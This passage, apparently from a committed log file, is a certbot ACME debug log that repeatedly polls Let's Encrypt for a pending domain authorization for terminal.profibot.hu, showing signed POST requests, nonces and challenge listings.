"https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:50,392:DEBUG:acme.client:Storing nonce: z6o3uXKg-a7OpxHOXb3wPef95UJ2hhZTZ2HDCbQjVvdRWbBe2Fs +2026-01-27 23:19:50,393:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:53,394:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:53,398:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ6Nm8zdVhLZy1hN09weEhPWGIzd1BlZjk1VUoyaGhaVFoySERDYlFqVnZkUldiQmUyRnMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "ZLVA55f6-YN8qcRF9tB_hrOOEByrvlC2e7KfX3RRsbXq8wwsQjedepK6Zjvkdc_ffFV2-SUlosFFtzHu8KlWLm6JIS8ec95rCJAaZvQcSm5oT8FqeilQz0BPxKT06RImeVZF9XJxE7__XJXnQsJrTO6sy0hBMig6XowluB5-1YmmgwKjLP4CnkK0HsbfjS3u5exKD8k-LdUuxjk6jnXDtcEtCiOXyqVr9-8VJB7YMAd1a2x69b_2tsCgbQuU16RzPrwCZRqgHBl_5tIMbL5t6teEvZv2hAr1PndFJ1jiIjUZZiYw-VuUFw1I673SlKSb_G4GQO-X_JNHZkl8YPtjIg", + "payload": "" +} +2026-01-27 23:19:53,543:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:53,544:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:53 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjlJEBhigl3ijYKrH0BH9kX17Igle99Ql7J2iZSkxRAoTw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:53,545:DEBUG:acme.client:Storing nonce: F4vGLPjlJEBhigl3ijYKrH0BH9kX17Igle99Ql7J2iZSkxRAoTw +2026-01-27 23:19:53,545:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:56,546:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:56,550:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbEpFQmhpZ2wzaWpZS3JIMEJIOWtYMTdJZ2xlOTlRbDdKMmlaU2t4UkFvVHciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "DjnVA5-KBTkNGHA8qY4AFUT5M9LBtQr7gwB28lNmezzOSY5iY48Jbak5WH1fm6s2FDRmQ7wydcNQxAv-vk9Y7FWJyDKc_UI6mB4-39aDi_YsXpEAb0PQEO2yIkrC_3N6E9nBYCr2nSJhaTco9838foSdWFPwnIUUPTRDIIJ7Djbvpe-gyWQ0TWl69BS0RPOW1GAAxvr2VIs54H7NBWwq0OQY_Rto3TkFSN9Tj-yDasbNbGyxeNxQp4XF2xnrlJmEQ1LyCLqfWYLsIdf9MaJdtsg9qbtsKH4PDx4H8mQcs-_Ma4053qYqqdRdGkzOE-FR_4RSJo8UZbHne1hSBvSyTQ", + "payload": "" +} +2026-01-27 23:19:56,697:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:56,698:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:56 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjlk4IcPD7MvE-CBZLLPpP2q_gZCUoLLvPftv412OAMCeo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:56,698:DEBUG:acme.client:Storing nonce: F4vGLPjlk4IcPD7MvE-CBZLLPpP2q_gZCUoLLvPftv412OAMCeo +2026-01-27 23:19:56,699:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:59,700:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:59,704:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbGs0SWNQRDdNdkUtQ0JaTExQcFAycV9nWkNVb0xMdlBmdHY0MTJPQU1DZW8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "ePP0t4A123zNefH1oNmeVoXzDm_hZADBJIulHNXfNlrwifmPdGm8kGCMJQV4uFk0xM9T7aQHSTzZ49CMDl0h6JwVHQ0ULVIycFiTfKgbc66soP7WHZAqq9_vsq_-QQqJKathcnz_-liRTt5S4HvVNf2ZY0VU29We7xyI5AqHD1KRYcOL9lLPoC9AMR4xv1JxAEJXlrdqOCsIg5aiBytWyuNuWYMnpuXjzayQqhFERhYZD2OzVw5sHK2wjkCwgeGj7mTuNwPeeMHlf6C0uizAW1VT99xVsgE5YSfP89NKBlG-Ghvq_sNDZLdnNGWlBPMr2-sruhkkip-TBQSgBCZBzQ", + "payload": "" +} +2026-01-27 23:19:59,849:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:59,850:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:59 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: z6o3uXKg2ozdFibTBHal_gvKR92FDXipfXNPRntyGdiJDc6FLrY +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:59,850:DEBUG:acme.client:Storing nonce: z6o3uXKg2ozdFibTBHal_gvKR92FDXipfXNPRntyGdiJDc6FLrY +2026-01-27 23:19:59,851:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:20:02,852:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:20:02,856:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ6Nm8zdVhLZzJvemRGaWJUQkhhbF9ndktSOTJGRFhpcGZYTlBSbnR5R2RpSkRjNkZMclkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "DFqtIsyIstfx1lJwh94eT8aR9xYmaptfbOm8mTR2exGhU8kJ8SPMP8wg5ZgN0Wd6bXIudIrFFYsuaqVBh-2W4_yCp3mYp06vmAqYyvqYzKNFunDPvgsFaKXExoea4mIkEW5qegsH_c3FqEZMlhCRc5gcZ9di-x7L9ZGkLxhgkE9NXsdAeAEdDGi1nOHiDTpWwIja16BCvi28q_dmlsBF-pmNBpDC8Pe2NICMaF06A_vJm6kj3s4yusycMl71OOWFeZBdDOQopOSs1TmoegqmAfGKNZQAkxP_k-ztB9mPeK-qi5UPpkAWRQfVIR9k-dVOh7vIiwZAA-LZMN9_NSm7Pw", + "payload": "" +} +2026-01-27 23:20:03,001:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:20:03,002:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:20:02 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjlKmFAtEcUD_lmSqXB9jsKNV-LCldjrhaRwUE6q-8Cp90 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:20:03,003:DEBUG:acme.client:Storing nonce: F4vGLPjlKmFAtEcUD_lmSqXB9jsKNV-LCldjrhaRwUE6q-8Cp90 +2026-01-27 23:20:03,003:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:20:06,004:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:20:06,008:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbEttRkF0RWNVRF9sbVNxWEI5anNLTlYtTENsZGpyaGFSd1VFNnEtOENwOTAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "gwiozPIeUoIELN2qav2q93CdYUS6b7Vz8KLeLuLChmLj1J6-_bk9IJBfGVWxCtEAR8p7n6rEL9NA5bErZdVqueMNmbgmBqXoN-0LbmVygs-ZkladGHpb8Crvt4L2QV25AF1eXxJZMgiayOJnt7TN3c1Iz_9cPgRFrMVSqOKhugeqrmwgWyi9LpiM7P_dlc7u5pNYcSLnGGNNvGmaGj1TH531p8M4mF2Ds10P4YLrPV8DVqAgfVlqXM494Ny9hK1rP880r4FNhB870u9eCRje7laTkOpcyc1W2ta0grypOkEBEpU_UzzCfy4XkIog8i0U9kTM0azsu62NX35inZcvcA", + "payload": "" +} +2026-01-27 23:20:06,226:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:20:06,227:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:20:06 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: z6o3uXKgru0Pcty7uEVBD2gi1-FV5kJYTarG5PbKs2Qv4cmE9hQ +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:20:06,227:DEBUG:acme.client:Storing nonce: z6o3uXKgru0Pcty7uEVBD2gi1-FV5kJYTarG5PbKs2Qv4cmE9hQ +2026-01-27 23:20:06,228:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:20:09,229:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:20:09,233:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ6Nm8zdVhLZ3J1MFBjdHk3dUVWQkQyZ2kxLUZWNWtKWVRhckc1UGJLczJRdjRjbUU5aFEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "CWmKgeai52e4UBGzO25eUml2CmXM1yvyeU9Bf1PGyZMif1NDjNVyguD6H_FO393kBgIknxWEzLJClt0rt8A_9Qs8ZQy9uUPh8YzIsPztXoK4DJe5wh9Nzp3hLschgGUZg9WcWdS3D7oFRbjLa1eaiDy1RGK05t_8ypi3t8KIFk2-XnPCWgPurGFWSLsHct2pKY4JwXdn46fThN3nlrARG_QeHYMnV4sm66_uuyC9dTSfmKK9WHiGrkw0UIhg_5tn-7sNOxle80BAMyV24bDeA22akxTTFnWkfV7ZvzxeJPPwm6ZjJTvcMlfqZSdj0jQR12yGWkBHE-x6ggWcQ1JsMA", + "payload": "" +} +2026-01-27 23:20:09,379:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:20:09,380:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:20:09 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: z6o3uXKgQo2Il9Eaj8O6xn-RpLC80HjhFu7hNSrF9jlhsu4VB5o +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:20:09,380:DEBUG:acme.client:Storing nonce: z6o3uXKgQo2Il9Eaj8O6xn-RpLC80HjhFu7hNSrF9jlhsu4VB5o +2026-01-27 23:20:09,380:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:20:12,381:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:20:12,383:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ6Nm8zdVhLZ1FvMklsOUVhajhPNnhuLVJwTEM4MEhqaEZ1N2hOU3JGOWpsaHN1NFZCNW8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "MCpoimDKnKOSPt9z9coliWNz7H3Vu-KJ68VWQpNppN71nv4Mvz9PN1CU_82qi8L_eE9H1YjDC0GsZ7Kyk2ysW-GS2_HdCciLmKuq1lguchC_FHsq1DfQsvZuAIEXtoLlftGeCf2SliiAkHwriu6kuBpqONc3ly9tlBHBB8UGFUflVgg4rajLIDTtxx0KlYDXnluDSO9UGamcmtUj4t6pcBmfCDu5iZG2cLtrgM0ewPPFnXcT4nDSy4ozLttZH2z_ABq_oAJYEKKQd5D2LOe2kZUMMoLQtIFfR-4Tnq4_3J5IcmrDbxK3VtEYdk-oYrb2XMLJXpYt86gmKylN7JNDNg", + "payload": "" +} +2026-01-27 23:20:12,527:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:20:12,528:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:20:12 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: z6o3uXKggbjvx5OpKnTQfIs_DJ3x5wQ_QH3Jxrb464zV_Y8Gae4 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:20:12,529:DEBUG:acme.client:Storing nonce: z6o3uXKggbjvx5OpKnTQfIs_DJ3x5wQ_QH3Jxrb464zV_Y8Gae4 +2026-01-27 23:20:12,529:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:20:15,530:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:20:15,534:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ6Nm8zdVhLZ2dianZ4NU9wS25UUWZJc19ESjN4NXdRX1FIM0p4cmI0NjR6Vl9ZOEdhZTQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "k83lPDfPCFWVo4eHK8qRp6jIdPYcl9BfgfhOzeHSa_iB1LEaXrYHlZJvj-zgZoSqPuAyCwVgM0rbTdcdi40ta1cvhgJ34SW4ZyAwgFnv0b8VNelCtf5gIKUv4QnkU6RymBcV8k-sGWY2pDuVdAUSChvCvEEvvFrdtb1LH1xuks28ahsEBsZ99cStqsGbep-9_Pt1yH4rNGbjji3btgQUDQnY3hqnM8qoRE9A1Qn-jsxbWwofYsDJYG2CshWUuC5z8bdH708JBJfA_K-NpQu1iwmxuViK_UPzOLUtiX8koXdCtqCBWrJ6et0fPcCjhDdej2G6_ThtOM-7t8d9ru0wbA", + "payload": "" +} +2026-01-27 23:20:15,678:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:20:15,679:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:20:15 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: z6o3uXKgxYw3sI93rhD2AcoRBINr30dPgoIiyJ7AsuHMOC1Iz-g +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:20:15,679:DEBUG:acme.client:Storing nonce: z6o3uXKgxYw3sI93rhD2AcoRBINr30dPgoIiyJ7AsuHMOC1Iz-g +2026-01-27 23:20:15,680:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:20:18,681:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:20:18,685:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": 